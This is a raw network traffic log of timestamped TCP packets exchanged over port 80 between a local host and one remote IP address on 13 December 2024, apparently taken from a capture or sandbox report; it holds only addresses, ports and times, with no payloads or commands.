                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.142141104 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.143134117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.143210888 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.143255949 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.144304991 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.144349098 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.144407034 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.145519018 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.145560980 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.145565033 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.146648884 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.146701097 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.277898073 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.277971983 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278024912 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278074980 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278381109 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278429031 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278625965 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278671026 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278754950 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.278795004 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.279872894 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.279917002 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.279949903 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.280003071 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.281052113 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.281092882 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.281135082 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.281183004 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.282278061 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.282322884 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.282361031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.282397985 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.283437967 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.283483982 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.283524990 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.283561945 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.284627914 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.284742117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.284768105 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.284779072 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.285798073 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.285841942 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.285900116 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.286571026 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.287046909 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.287111998 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.287164927 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.287166119 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.288204908 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.288254023 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.288311005 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.288410902 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.289402962 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.289439917 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.289489031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.289525032 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.290606976 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.290662050 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.290693045 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.290731907 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.291786909 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.291932106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.291980982 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.292102098 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.292970896 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.292988062 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.293080091 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.293080091 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.294214964 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.294260025 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.294298887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.294336081 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.295443058 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.295486927 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.295555115 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.295897961 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.296653032 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.296716928 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.296760082 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.297736883 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.297791958 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.297835112 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.297878027 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.299037933 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.299093008 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.299134016 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.300160885 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.300257921 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.300276041 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.300293922 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.301347971 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.301400900 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.301448107 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.301486015 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.302553892 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.302623987 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.302640915 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.302741051 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.303730011 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.303797960 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.303941965 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.303980112 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.304909945 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.304955006 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.304994106 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.305032969 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.306118011 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.306211948 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.306241035 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.306288958 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.307286024 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.307331085 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.307463884 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.307502985 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.308476925 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.308516026 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.308588982 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.308693886 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.309734106 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.309781075 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.309849977 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.309892893 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.310975075 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.311017990 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.311072111 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.311131001 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.312238932 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.312288046 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.312318087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.312393904 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.313488007 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.313538074 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.313606024 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.313900948 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.314546108 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.314593077 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.314595938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.314635992 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.315650940 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.315692902 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.315730095 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.315767050 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.316852093 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.316890955 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.316987991 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.317022085 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.318058968 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.318147898 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.318156004 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.318190098 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.319250107 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.319353104 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.319392920 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.320472002 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.320524931 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.320555925 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.320708990 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.321640015 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.321688890 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.321703911 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.321744919 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.322841883 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.322894096 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.322910070 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.323028088 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.324014902 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.324079990 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.324112892 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.324693918 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.325176001 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.325215101 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.325289011 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.325333118 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.326390028 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.326476097 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.326483965 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.326518059 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.327565908 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.327615976 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.327656031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.327692032 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.328764915 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.328805923 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.328876972 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.328912973 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.329982996 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.330022097 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.330055952 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.330090046 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.331201077 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.331316948 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.331317902 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.331358910 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.332375050 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.332478046 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.332498074 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.332516909 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.333585024 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.333638906 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.333663940 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.333707094 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.334758997 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.334882021 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.334903955 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.334918976 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.335954905 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.335992098 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.336033106 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.336076975 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.337142944 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.337193012 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.337224960 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.337265015 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.338325977 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.338386059 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.338411093 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.338447094 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.339508057 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.339586020 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.339620113 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.339662075 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470010042 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470045090 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470073938 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470132113 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470220089 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470266104 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470334053 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.470371962 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.471445084 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.471506119 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.471549034 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.471849918 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.472656012 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.472747087 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.472788095 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.472822905 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.473834038 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.473859072 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.473881960 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.473897934 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.474987030 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.475075960 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.475091934 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.475116968 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.476202965 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.476265907 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.476291895 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.476465940 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.477513075 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.477557898 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.477629900 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.477678061 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.478600979 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.478646040 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.478683949 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.478856087 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.479780912 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.479832888 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.479880095 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.479918957 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.480979919 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.481021881 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.481117964 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.481164932 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.482182980 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.482268095 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.482285023 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.482364893 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.483411074 CET8049814185.215.113.16192.168.2.4
